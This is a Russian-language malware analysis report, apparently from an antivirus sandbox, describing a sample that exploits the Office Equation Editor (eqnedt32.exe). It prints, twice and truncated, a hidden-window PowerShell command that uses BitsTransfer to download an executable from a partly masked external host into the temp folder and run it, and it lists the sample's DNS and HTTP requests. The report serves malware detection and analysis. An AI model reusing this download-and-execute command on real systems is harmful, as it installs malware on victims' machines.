Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$p=$env:temp+'\Y.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://pe###hack.com/css/page/sky.exe' -Destination $p;(New-Object -com Shell.Application).ShellE...
Сетевая активность
TCP
Запросы HTTP GET
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
UDP
- DNS ASK pe###hack.com
- DNS ASK oc##.#tartssl.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$p=$env:temp+'\Y.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://pe###hack.com/css/page/sky.exe' -Destination $p;(New-Object -com Shell.Application).ShellE...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
